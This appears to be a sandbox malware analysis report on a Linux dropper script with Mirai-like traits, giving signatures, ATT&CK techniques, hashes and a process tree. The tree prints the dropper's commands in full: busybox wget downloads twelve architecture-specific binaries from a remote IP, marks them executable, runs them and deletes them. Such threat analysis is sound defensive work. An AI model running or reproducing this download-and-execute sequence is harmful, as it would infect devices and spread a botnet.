a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b

Analysis

max time kernel
149s
max time network
150s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
23-11-2024 02:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Size

1KB
MD5

476467eba539be5db3022f1ebde08841
SHA1

6fc462604c405f96b0823e2baa077f150b1bb33f
SHA256

a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b
SHA512

c6fe968567d3e60e8ecef1152c1a389c40245ce0b9a73880a2ff895443bc272000bf76b78c252c646a4a7f737a8564476740fa82792ca9847aa1071f28e47234

Score

9^/10

defense_evasion discovery

Malware Config

Signatures

Contacts a large (98107) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

busyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusybox

pid process

1523 busybox
1533 busybox
1543 busybox
1548 busybox
1553 busybox
1508 busybox
1513 busybox
1518 busybox
1559 busybox
1503 busybox
1528 busybox
1538 busybox

pid	process
1523	busybox
1533	busybox
1543	busybox
1548	busybox
1553	busybox
1508	busybox
1513	busybox
1518	busybox
1559	busybox
1503	busybox
1528	busybox
1538	busybox

Executes dropped EXE 12 IoCs

Processes:

jklarmjklarm5jklarm6jklarm7jklm68kjklmipsjklmpsljklppcjklsh4jklspcjklx86jklarc

ioc	pid	process
/tmp/jklarm	1504	jklarm
/tmp/jklarm5	1509	jklarm5
/tmp/jklarm6	1514	jklarm6
/tmp/jklarm7	1519	jklarm7
/tmp/jklm68k	1524	jklm68k
/tmp/jklmips	1529	jklmips
/tmp/jklmpsl	1534	jklmpsl
/tmp/jklppc	1539	jklppc
/tmp/jklsh4	1544	jklsh4
/tmp/jklspc	1549	jklspc
/tmp/jklx86	1554	jklx86
/tmp/jklarc	1560	jklarc

Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
defense_evasion

Impair Defenses
T1562

Processes:

jklx86

description ioc process

File opened for modification /dev/watchdog jklx86
File opened for modification /dev/misc/watchdog jklx86
Renames itself 1 IoCs

Processes:

jklx86

pid process

1554 jklx86
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 202.61.197.122
Destination IP 185.181.61.24
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
discovery

System Network Connections Discovery
T1049

Processes:

jklx86

description ioc process

File opened for reading /proc/net/tcp jklx86
Enumerates running processes
Discovers information about currently running processes on the system
Changes its process name 1 IoCs

Processes:

jklx86

description pid process

Changes the process name, possibly in an attempt to hide itself 1554 jklx86
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
discovery

Internet Connection Discovery
T1016.001

Processes:

jklx86

description ioc process

File opened for reading /proc/net/tcp jklx86

description	ioc	process
File opened for modification	/dev/watchdog	jklx86
File opened for modification	/dev/misc/watchdog	jklx86

pid	process
1554	jklx86

description	ioc
Destination IP	202.61.197.122
Destination IP	185.181.61.24

description	ioc	process
File opened for reading	/proc/net/tcp	jklx86

description	pid	process
Changes the process name, possibly in an attempt to hide itself	1554	jklx86

description	ioc	process
File opened for reading	/proc/net/tcp	jklx86

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

jklx86

description	ioc	process
File opened for reading	/proc/754/status	jklx86
File opened for reading	/proc/784/status	jklx86
File opened for reading	/proc/1175/status	jklx86
File opened for reading	/proc/1245/status	jklx86
File opened for reading	/proc/460/status	jklx86
File opened for reading	/proc/465/status	jklx86
File opened for reading	/proc/1246/status	jklx86
File opened for reading	/proc/1050/status	jklx86
File opened for reading	/proc/1111/status	jklx86
File opened for reading	/proc/1138/status	jklx86
File opened for reading	/proc/1298/status	jklx86
File opened for reading	/proc/642/status	jklx86
File opened for reading	/proc/676/status	jklx86
File opened for reading	/proc/990/status	jklx86
File opened for reading	/proc/1026/status	jklx86
File opened for reading	/proc/1058/status	jklx86
File opened for reading	/proc/1128/status	jklx86
File opened for reading	/proc/1182/status	jklx86
File opened for reading	/proc/1260/status	jklx86
File opened for reading	/proc/406/status	jklx86
File opened for reading	/proc/441/status	jklx86
File opened for reading	/proc/547/status	jklx86
File opened for reading	/proc/553/status	jklx86
File opened for reading	/proc/1315/status	jklx86
File opened for reading	/proc/1377/status	jklx86
File opened for reading	/proc/1497/status	jklx86
File opened for reading	/proc/1098/status	jklx86
File opened for reading	/proc/1107/status	jklx86
File opened for reading	/proc/1142/status	jklx86
File opened for reading	/proc/1475/status	jklx86
File opened for reading	/proc/315/status	jklx86
File opened for reading	/proc/321/status	jklx86
File opened for reading	/proc/602/status	jklx86
File opened for reading	/proc/888/status	jklx86
File opened for reading	/proc/1054/status	jklx86
File opened for reading	/proc/1061/status	jklx86
File opened for reading	/proc/1174/status	jklx86
File opened for reading	/proc/1178/status	jklx86
File opened for reading	/proc/269/status	jklx86
File opened for reading	/proc/477/status	jklx86
File opened for reading	/proc/490/status	jklx86
File opened for reading	/proc/698/status	jklx86
File opened for reading	/proc/1289/status	jklx86
File opened for reading	/proc/517/status	jklx86
File opened for reading	/proc/929/status	jklx86
File opened for reading	/proc/1338/status	jklx86
File opened for reading	/proc/488/status	jklx86
File opened for reading	/proc/489/status	jklx86
File opened for reading	/proc/1173/status	jklx86
File opened for reading	/proc/1216/status	jklx86
File opened for reading	/proc/1132/status	jklx86
File opened for reading	/proc/1150/status	jklx86
File opened for reading	/proc/1556/status	jklx86
File opened for reading	/proc/404/status	jklx86
File opened for reading	/proc/983/status	jklx86
File opened for reading	/proc/993/status	jklx86
File opened for reading	/proc/1046/status	jklx86
File opened for reading	/proc/1102/status	jklx86
File opened for reading	/proc/1218/status	jklx86
File opened for reading	/proc/409/status	jklx86
File opened for reading	/proc/516/status	jklx86
File opened for reading	/proc/601/status	jklx86
File opened for reading	/proc/639/status	jklx86
File opened for reading	/proc/1491/status	jklx86

System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

busyboxjklmipsbusybox

pid process

1527 busybox
1529 jklmips
1531 busybox

pid	process
1527	busybox
1529	jklmips
1531	busybox

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

Processes:

busyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusybox

description	ioc	process
File opened for modification	/tmp/jklarc	busybox
File opened for modification	/tmp/jklarm5	busybox
File opened for modification	/tmp/jklarm6	busybox
File opened for modification	/tmp/jklmpsl	busybox
File opened for modification	/tmp/jklppc	busybox
File opened for modification	/tmp/jklsh4	busybox
File opened for modification	/tmp/jklx86	busybox
File opened for modification	/tmp/jklarm	busybox
File opened for modification	/tmp/jklarm7	busybox
File opened for modification	/tmp/jklm68k	busybox
File opened for modification	/tmp/jklmips	busybox
File opened for modification	/tmp/jklspc	busybox

/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
1⤵
PID:1497
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklarm -O jklarm
  2⤵
  - Writes file to tmp directory
  PID:1498
- /bin/busybox
  /bin/busybox chmod +x jklarm
  2⤵
  - File and Directory Permissions Modification
  PID:1503
- /tmp/jklarm
  ./jklarm NewTel
  2⤵
  - Executes dropped EXE
  PID:1504
- /bin/busybox
  /bin/busybox rm -rf jklarm
  2⤵
  PID:1506
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklarm5 -O jklarm5
  2⤵
  - Writes file to tmp directory
  PID:1507
- /bin/busybox
  /bin/busybox chmod +x jklarm5
  2⤵
  - File and Directory Permissions Modification
  PID:1508
- /tmp/jklarm5
  ./jklarm5 NewTel
  2⤵
  - Executes dropped EXE
  PID:1509
- /bin/busybox
  /bin/busybox rm -rf jklarm5
  2⤵
  PID:1511
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklarm6 -O jklarm6
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/busybox
  /bin/busybox chmod +x jklarm6
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /tmp/jklarm6
  ./jklarm6 NewTel
  2⤵
  - Executes dropped EXE
  PID:1514
- /bin/busybox
  /bin/busybox rm -rf jklarm6
  2⤵
  PID:1516
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklarm7 -O jklarm7
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/busybox
  /bin/busybox chmod +x jklarm7
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/jklarm7
  ./jklarm7 NewTel
  2⤵
  - Executes dropped EXE
  PID:1519
- /bin/busybox
  /bin/busybox rm -rf jklarm7
  2⤵
  PID:1521
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklm68k -O jklm68k
  2⤵
  - Writes file to tmp directory
  PID:1522
- /bin/busybox
  /bin/busybox chmod +x jklm68k
  2⤵
  - File and Directory Permissions Modification
  PID:1523
- /tmp/jklm68k
  ./jklm68k NewTel
  2⤵
  - Executes dropped EXE
  PID:1524
- /bin/busybox
  /bin/busybox rm -rf jklm68k
  2⤵
  PID:1526
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklmips -O jklmips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1527
- /bin/busybox
  /bin/busybox chmod +x jklmips
  2⤵
  - File and Directory Permissions Modification
  PID:1528
- /tmp/jklmips
  ./jklmips NewTel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1529
- /bin/busybox
  /bin/busybox rm -rf jklmips
  2⤵
  - System Network Configuration Discovery
  PID:1531
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklmpsl -O jklmpsl
  2⤵
  - Writes file to tmp directory
  PID:1532
- /bin/busybox
  /bin/busybox chmod +x jklmpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1533
- /tmp/jklmpsl
  ./jklmpsl NewTel
  2⤵
  - Executes dropped EXE
  PID:1534
- /bin/busybox
  /bin/busybox rm -rf jklmpsl
  2⤵
  PID:1536
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklppc -O jklppc
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/busybox
  /bin/busybox chmod +x jklppc
  2⤵
  - File and Directory Permissions Modification
  PID:1538
- /tmp/jklppc
  ./jklppc NewTel
  2⤵
  - Executes dropped EXE
  PID:1539
- /bin/busybox
  /bin/busybox rm -rf jklppc
  2⤵
  PID:1541
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklsh4 -O jklsh4
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/busybox
  /bin/busybox chmod +x jklsh4
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/jklsh4
  ./jklsh4 NewTel
  2⤵
  - Executes dropped EXE
  PID:1544
- /bin/busybox
  /bin/busybox rm -rf jklsh4
  2⤵
  PID:1546
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklspc -O jklspc
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/busybox
  /bin/busybox chmod +x jklspc
  2⤵
  - File and Directory Permissions Modification
  PID:1548
- /tmp/jklspc
  ./jklspc NewTel
  2⤵
  - Executes dropped EXE
  PID:1549
- /bin/busybox
  /bin/busybox rm -rf jklspc
  2⤵
  PID:1551
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklx86 -O jklx86
  2⤵
  - Writes file to tmp directory
  PID:1552
- /bin/busybox
  /bin/busybox chmod +x jklx86
  2⤵
  - File and Directory Permissions Modification
  PID:1553
- /tmp/jklx86
  ./jklx86 NewTel
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Renames itself
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1554
- /bin/busybox
  /bin/busybox rm -rf jklx86
  2⤵
  PID:1556
- /bin/busybox
  /bin/busybox wget http://45.125.66.203/jklarc -O jklarc
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/busybox
  /bin/busybox chmod +x jklarc
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /tmp/jklarc
  ./jklarc NewTel
  2⤵
  - Executes dropped EXE
  PID:1560
- /bin/sh
  /bin/sh ./jklarc NewTel
  2⤵
  PID:1560
- /bin/busybox
  /bin/busybox rm -rf jklarc
  2⤵
  PID:1561
- /bin/busybox
  /bin/busybox rm -rf wget.sh
  2⤵
  PID:1562

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jklarc

Filesize
21B

MD5
9e693458d3fdf80bb412b7694559ee76

SHA1
b0dd364c99bf0ac7bebf7a966c568da97bd74bbd

SHA256
08fd6f73820fcbd5332a0b705782e7eb19be4a65008ecabe95b9de4f4faa17fc

SHA512
0a3bd653cfbbb194f3ec0b932e6d6af6c563e05fab76bb9b540fd35d1f5538ed784392ed3ae6a89c97101a0a09cd41295b3725e4a3a9f4bc2db8f57502b36527

Download Submit
/tmp/jklarm

Filesize
61KB

MD5
ccc0e90e52316a5e000734aa3ab7ccdb

SHA1
38974e871dea717ef4d69f3f7644284a1b2a7110

SHA256
e3ad3137e9ffc774a2916f5e329689397fc156318c21d5429089e24c3df6536a

SHA512
247073ec1f9b19ff2349cc4f67b05e01fc7ce472aef06851ca272c756e439205631c7fe26112cc01db9149e83af550ea5666876bd9b06ca44255ecb4d35e5c1c

Download Submit
/tmp/jklarm5

Filesize
61KB

MD5
5d2923d3bb5d7daf3c286d3de1c69842

SHA1
c761cc78bd7c286b8a95701c8a6c215b0ed7a41f

SHA256
4b36c1e443a9b1f76c30d9e4c240cf11ba7728ef0ffb83965fe31720e7c5633e

SHA512
593fb52539469a132036265869082eda84b86f4c63937f74b37efa3023a4e8b5b47cdbdcabc13c1257714762c6c25a7305f743dee5ab8c8ef55d64a64f28cda2

Download Submit
/tmp/jklarm6

Filesize
70KB

MD5
bd890549b6469679c05204c8893564d9

SHA1
8e4655e1e4514fc49e19d914ce0e6d482dfe2d71

SHA256
e5369f948a5f127f736149c3ba45bb65d0cc463d95bdda10ae4ba428484d43a2

SHA512
8cad0724fd27828f29217ebf871975a429e5192427e24390de26d234352ca8d3b429969e27220bee03cd0376613e6e69e01471c5b88e1a074857bcec522ae5c4

Download Submit
/tmp/jklarm7

Filesize
83KB

MD5
b80f98bdc6f71e155d0e091e5ab5002d

SHA1
8b25aa2e46fafdc6e4e0e3c1bff2748f5e563f8f

SHA256
9aa3f02c4310d7d9b86b90d875d3845e6b814eea8d524a6f728394caea489f3f

SHA512
0a45cef1502c2280d74b376a5400a399f5fc504fa2a9ba65fb129b9c4929c165b27f6c9d038d97e91e72d1c7d31a76fd4e46b178a41dae000a6cf12f9971339c

Download Submit
/tmp/jklm68k

Filesize
61KB

MD5
415fcb79b0155ca5bb0ad3679a042ee8

SHA1
d19937ba72dd1cbd7e78f2fe3cc802519d37e50f

SHA256
f3911ea019b772760dd0aee45454a9054441478361bed4cfbbc3831eb6f5edf9

SHA512
b3bfa62fbadd31206b3dbeac15dda3abf9eb113bbb74a5eb387e68d761f3ba350d3d5bbfee05a7c8d24092ce16ffa31a01799a7efc1bb771c8607c5d6abf566d

Download Submit
/tmp/jklmips

Filesize
78KB

MD5
0d28778c12ca8187d7c25a39cbf139b5

SHA1
d6acf3d900bfa3cd334bbe4fb077aef271ef9b7b

SHA256
88e10bb097ce1060c1f2798a3cd7d94eccde25e260d7ec8b08731f47d6c1b692

SHA512
9ecdfd171809eee4b80289f341c1bf7a432b929e9eb5dd2659ff828ed0921476cfd79d6c0f475b04bf06d4fc55adb8bc6413a349b203ec5065e0182cac2134b9

Download Submit
/tmp/jklmpsl

Filesize
82KB

MD5
cac710f2fa3123733fc72154a1017660

SHA1
368534cb46325c7338ed84a70ce7938064385234

SHA256
1d7789e5a8631a90c8de5d053928129ff900baa1052e4e1f3aaac13751ffef0f

SHA512
7be9169cc87d3acc9a05d7ee0e93f9019f74c37e325d0c1f66925eb7a0a12fa4a36c22b4bb69533e68b5197f6431ae40c819778d423047bd651ddadbcd7f85f2

Download Submit
/tmp/jklppc

Filesize
60KB

MD5
f9d899a6406e57e2d71b4efdcb905d14

SHA1
ba89bac01e988337212f82a3748a2e78e7b6b433

SHA256
fc1ccb3b24fe1ab63f367863c6f5c29096722a6ef4249ac7d6098855366edf0b

SHA512
2a0b6aa14d7a77df42ed0e9ab8e3f9f8a4809a11214fe55a456fa8daaf7f5d5705e6cd8f027c6acb64c4e5134f1352464ae17cfe6453507f893cda77429b04dc

Download Submit
/tmp/jklsh4

Filesize
54KB

MD5
55ec4127f02a2da58051392d8444fe43

SHA1
ac171a19abf98ef9a508a71daa8c94919c508b6c

SHA256
f7969c00f4f2a706dc5e5f0061c3b9dbfc14532fcfe475dee2371e9c2755fa43

SHA512
07f98e2d027384e5e711674404920e2dcb3f405544736300c79b20ef569c748d39cf0d6cdd52a3934129586670edb8ad67f9c14a67e5e7784fc84efbda4ed65d

Download Submit
/tmp/jklspc

Filesize
64KB

MD5
6b1c85406a762b1c6e733fe3956912a8

SHA1
74d5c40b1a36d1bff9bb19f080dac1821de12e5e

SHA256
6a3fe820e19bb46aec4937415ff98099d2b15f1e2a98649f3bf9bfe662a27994

SHA512
7374ad3acdc9c0c3348668d563c0651144d1e83b6dde746c0e2224e8db4856166253bd26c5cbcb27993725f56b1dac714d9c5ce3f79c3a18d179ff87879106b9

Download Submit
/tmp/jklx86

Filesize
56KB

MD5
82934c42a0cf76b383943fbe49435fa5

SHA1
063a3ae2bd12986a68c56b500267abd42fdd1134

SHA256
1dd6c9bc4f5f44c480be2ee4841629ab0a15981617550bec5d9bf970d34819db

SHA512
5e2c49c028b69fe06ec025b067538dbd35ac4027ac8e246ef1932db4fd430d1e9d3f1843846d377b02ac4a6203e1562da279ec4cfc21a6ab0a48669a97f209eb

Download Submit